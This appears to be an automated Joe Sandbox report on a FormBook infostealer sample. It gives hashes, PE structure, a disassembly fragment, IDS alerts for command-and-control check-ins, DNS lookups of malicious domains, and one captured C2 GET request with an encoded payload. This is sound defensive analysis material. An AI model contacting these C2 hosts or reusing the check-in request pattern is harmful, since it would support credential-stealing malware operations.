http://www.taxiquynhonnew.click/y49d/ | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://l3filejson4dvd.josyliving.com/favicon.ico | tzutil.exe, 00000008.00000002.3286155450.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://connect.facebook.net/en_US/fbevents.js | tzutil.exe, 00000008.00000002.3284671784.00000000039F6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3286155450.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s.yimg.com/wi/ytc.js | tzutil.exe, 00000008.00000002.3284671784.00000000039F6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3286155450.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://www.likesharecomment.net | EPnOHZVVNotZ.exe, 00000009.00000002.3285546671.0000000005430000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://analytics.tiktok.com/i18n/pixel/events.js | tzutil.exe, 00000008.00000002.3284671784.00000000039F6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3286155450.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dq0ib5xlct7tw.cloudfront.net/ | EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM | tzutil.exe, 00000008.00000002.3284671784.0000000003B88000.00000004.10000000.00040000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003698000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
161.97.142.144 | www.070001325.xyz | United States | 51167 | CONTABODE | false
209.74.77.107 | www.learnwithus.site | United States | 31744 | MULTIBAND-NEWHOPEUS | false
18.139.62.226 | dns.ladipage.com | United States | 16509 | AMAZON-02US | false
154.205.156.26 | all.wjscdn.com | Seychelles | 26484 | IKGUL-26484US | false
107.155.56.30 | www.expancz.top | United States | 135377 | UHGL-AS-APUCloudHKHoldingsGroupLimitedHK | false
3.33.130.190 | likesharecomment.net | United States | 8987 | AMAZONEXPANSIONGB | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588148
Start date and time: 2025-01-10 22:02:28 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 0Wu31IhwGO.exe (renamed because original name is a hash value)
Original Sample Name: e6e77931c83b25ca5e349b0c3a2ae39cab402ecfdde8a8507e10966da107f3b3.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@7/6
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 95
• Number of non-executed functions: 297
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 2.23.242.162, 4.245.163.56
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
                                                            No simulations
                                                            • 209.74.79.40
                                                            TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.64.189
                                                            z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.41
                                                            AMAZON-02UShttps://www.shinsengumiusa.com/mrloskieGet hashmaliciousUnknownBrowse
                                                            • 3.120.85.61
                                                            SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 18.141.10.107
                                                            fFoOcuxK7M.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                                                            • 18.141.10.107
                                                            statement.docGet hashmaliciousKnowBe4Browse
                                                            • 52.217.123.201
                                                            9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                            • 76.223.67.189
                                                            aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            invoice_AG60538.pdfGet hashmaliciousUnknownBrowse
                                                            • 143.204.205.214
                                                            CONTABODEgKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                            • 173.249.62.84
                                                            https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                            • 173.249.62.84
                                                            4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            82eqjqLrzE.exeGet hashmaliciousAsyncRATBrowse
                                                            • 144.91.79.54
                                                            DF2.exeGet hashmaliciousUnknownBrowse
                                                            • 173.249.2.110
                                                            Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                                            • 173.249.11.35
                                                            bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                            • 95.212.118.93
                                                            bot.mips.elfGet hashmaliciousMiraiBrowse
                                                            • 95.212.118.77
                                                            SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            No context
                                                            No context
                                                            Process:C:\Users\user\Desktop\0Wu31IhwGO.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Windows\SysWOW64\tzutil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1209935793793442
                                                            Encrypted:false
                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                            MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                            SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                            SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                            SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.716723906854592
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:0Wu31IhwGO.exe
                                                            File size:886'272 bytes
                                                            MD5:92af2b53955341af234b93ff7a4de5c6
                                                            SHA1:01b41afef6a77f9710aafe75bc5ef86dc50a3e8b
                                                            SHA256:e6e77931c83b25ca5e349b0c3a2ae39cab402ecfdde8a8507e10966da107f3b3
                                                            SHA512:4de4f268b4951ed921f45670b7e41758ae30484f7cf599ee57cc613ba323c336476b37a1dcbaeb24d0faabe6a07421eca544a1aecfad4180d0c452eb4d0a227c
                                                            SSDEEP:12288:wMMKhM39TXsTAiGelsxZY1DOokWcth7KGd0LkbFhg5zcrE6+ZGLGfUeJAOgH+:FMaciZ6oDbkjdxBhqzcrEp4oAje
                                                            TLSH:2115D0C03B3AB712DEACB430853AEDB862591E64B10479F36EED2B5776DD2125A0CF05
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."NYg..............0..n..........v.... ........@.. ....................................@................................
                                                            Icon Hash:335153b476545533
                                                            Entrypoint:0x4d8c76
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x67594E22 [Wed Dec 11 08:32:34 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            push ebx
                                                            add byte ptr [ecx+00h], bh
                                                            jnc 00007FB568B37432h
                                                            je 00007FB568B37432h
                                                            add byte ptr [ebp+00h], ch
                                                            add byte ptr [edx+00h], dl
                                                            add byte ptr [esi+00h], ah
                                                            insb
                                                            add byte ptr [ebp+00h], ah
                                                            arpl word ptr [eax], ax
                                                            je 00007FB568B37432h
                                                            imul eax, dword ptr [eax], 006E006Fh
                                                            add byte ptr [ecx+00h], al
                                                            jnc 00007FB568B37432h
                                                            jnc 00007FB568B37432h
                                                            add byte ptr [ebp+00h], ch
                                                            bound eax, dword ptr [eax]
                                                            insb
                                                            add byte ptr [ecx+00h], bh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            dec esp
                                                            add byte ptr [edi+00h], ch
                                                            popad
                                                            add byte ptr [eax+eax+00h], ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd8c24 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xda000 | 0x1294 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xdc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xd6cbc | 0xd6e00 | 5268247293306d507e395ffa60e90e9c | False | 0.886126790648633 | data | 7.7215249828363035 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xda000 | 0x1294 | 0x1400 | bd4b7f39a28280be41bed0c7cc50b61c | False | 0.7892578125 | data | 6.743184939445049 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xdc000 | 0xc | 0x200 | 87280ab4538d2061aefd5dd307bb1237 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xda0c8 | 0xed4 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9444151738672286
RT_GROUP_ICON | 0xdafac | 0x14 | data | | | 1.05
RT_VERSION | 0xdafd0 | 0x2be | data | | | 0.4658119658119658
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T22:05:23.195867+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49717 | 161.97.142.144 | 80 | TCP
2025-01-10T22:05:23.195867+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49717 | 161.97.142.144 | 80 | TCP
2025-01-10T22:05:40.031039+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49718 | 107.155.56.30 | 80 | TCP
2025-01-10T22:05:42.564699+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49719 | 107.155.56.30 | 80 | TCP
2025-01-10T22:05:45.117302+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49720 | 107.155.56.30 | 80 | TCP
2025-01-10T22:05:47.835328+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49721 | 107.155.56.30 | 80 | TCP
2025-01-10T22:05:47.835328+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49721 | 107.155.56.30 | 80 | TCP
2025-01-10T22:05:54.441084+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49722 | 18.139.62.226 | 80 | TCP
2025-01-10T22:05:56.994740+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49723 | 18.139.62.226 | 80 | TCP
2025-01-10T22:05:59.836770+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49724 | 18.139.62.226 | 80 | TCP
2025-01-10T22:06:02.464946+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49725 | 18.139.62.226 | 80 | TCP
2025-01-10T22:06:02.464946+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49725 | 18.139.62.226 | 80 | TCP
2025-01-10T22:06:16.294566+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49726 | 209.74.77.107 | 80 | TCP
2025-01-10T22:06:18.786010+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49727 | 209.74.77.107 | 80 | TCP
2025-01-10T22:06:21.321304+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49728 | 209.74.77.107 | 80 | TCP
2025-01-10T22:06:23.881170+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49729 | 209.74.77.107 | 80 | TCP
2025-01-10T22:06:23.881170+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49729 | 209.74.77.107 | 80 | TCP
2025-01-10T22:06:30.558773+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49730 | 154.205.156.26 | 80 | TCP
2025-01-10T22:06:33.246935+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49731 | 154.205.156.26 | 80 | TCP
2025-01-10T22:06:35.902236+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49732 | 154.205.156.26 | 80 | TCP
2025-01-10T22:06:38.397632+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.11 | 49733 | 154.205.156.26 | 80 | TCP
2025-01-10T22:06:38.397632+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.11 | 49733 | 154.205.156.26 | 80 | TCP
2025-01-10T22:06:43.968585+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49734 | 3.33.130.190 | 80 | TCP
2025-01-10T22:06:46.874309+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.11 | 49735 | 3.33.130.190 | 80 | TCP
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 10, 2025 22:05:22.555126905 CET | 192.168.2.11 | 1.1.1.1 | 0x8615 | Standard query (0) | www.070001325.xyz | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:05:38.249721050 CET | 192.168.2.11 | 1.1.1.1 | 0x9227 | Standard query (0) | www.expancz.top | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:05:52.973481894 CET | 192.168.2.11 | 1.1.1.1 | 0x7edd | Standard query (0) | www.taxiquynhonnew.click | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:07.488329887 CET | 192.168.2.11 | 1.1.1.1 | 0x5ba7 | Standard query (0) | www.epitomize.shop | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:15.609394073 CET | 192.168.2.11 | 1.1.1.1 | 0x1f86 | Standard query (0) | www.learnwithus.site | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:28.895590067 CET | 192.168.2.11 | 1.1.1.1 | 0xc69c | Standard query (0) | www.jijievo.site | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:43.453152895 CET | 192.168.2.11 | 1.1.1.1 | 0x29aa | Standard query (0) | www.likesharecomment.net | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 10, 2025 22:05:22.581259966 CET | 1.1.1.1 | 192.168.2.11 | 0x8615 | No error (0) | www.070001325.xyz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:05:39.058895111 CET | 1.1.1.1 | 192.168.2.11 | 0x9227 | No error (0) | www.expancz.top | | 107.155.56.30 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:05:53.491429090 CET | 1.1.1.1 | 192.168.2.11 | 0x7edd | No error (0) | www.taxiquynhonnew.click | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 10, 2025 22:05:53.491429090 CET | 1.1.1.1 | 192.168.2.11 | 0x7edd | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:05:53.491429090 CET | 1.1.1.1 | 192.168.2.11 | 0x7edd | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:07.498230934 CET | 1.1.1.1 | 192.168.2.11 | 0x5ba7 | Name error (3) | www.epitomize.shop | none | none | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:15.624454975 CET | 1.1.1.1 | 192.168.2.11 | 0x1f86 | No error (0) | www.learnwithus.site | | 209.74.77.107 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:29.023272991 CET | 1.1.1.1 | 192.168.2.11 | 0xc69c | No error (0) | www.jijievo.site | all.wjscdn.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 10, 2025 22:06:29.023272991 CET | 1.1.1.1 | 192.168.2.11 | 0xc69c | No error (0) | all.wjscdn.com | | 154.205.156.26 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:29.023272991 CET | 1.1.1.1 | 192.168.2.11 | 0xc69c | No error (0) | all.wjscdn.com | | 154.205.159.116 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:29.023272991 CET | 1.1.1.1 | 192.168.2.11 | 0xc69c | No error (0) | all.wjscdn.com | | 38.54.112.227 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:29.023272991 CET | 1.1.1.1 | 192.168.2.11 | 0xc69c | No error (0) | all.wjscdn.com | | 154.90.35.240 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:29.023272991 CET | 1.1.1.1 | 192.168.2.11 | 0xc69c | No error (0) | all.wjscdn.com | | 154.90.58.209 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:29.023272991 CET | 1.1.1.1 | 192.168.2.11 | 0xc69c | No error (0) | all.wjscdn.com | | 154.205.143.51 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:43.487240076 CET | 1.1.1.1 | 192.168.2.11 | 0x29aa | No error (0) | www.likesharecomment.net | likesharecomment.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Jan 10, 2025 22:06:43.487240076 CET | 1.1.1.1 | 192.168.2.11 | 0x29aa | No error (0) | likesharecomment.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false |
| Jan 10, 2025 22:06:43.487240076 CET | 1.1.1.1 | 192.168.2.11 | 0x29aa | No error (0) | likesharecomment.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false |
                                                            • www.070001325.xyz
                                                            • www.expancz.top
                                                            • www.taxiquynhonnew.click
                                                            • www.learnwithus.site
                                                            • www.jijievo.site
                                                            • www.likesharecomment.net
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.11 | 49717 | 161.97.142.144 | 80 | 5420 | C:\Program Files (x86)\PBaHAVgANOERWIReYLjHxBClcfYyZuzkoiTkaAPbEgcJWaCCdprdMTQzICy\EPnOHZVVNotZ.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Jan 10, 2025 22:05:22.604598999 CET | 545 | OUT | GET /gebt/?gtL8P=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA=&FZg8n=jDOt606X1jh HTTP/1.1 |
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.070001325.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Jan 10, 2025 22:05:23.195647001 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 10 Jan 2025 21:05:23 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 2966
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            ETag: "66cce1df-b96"
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                            Jan 10, 2025 22:05:23.195669889 CET | 1236 | IN |
                                                            Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                            Jan 10, 2025 22:05:23.195683956 CET | 448 | IN |
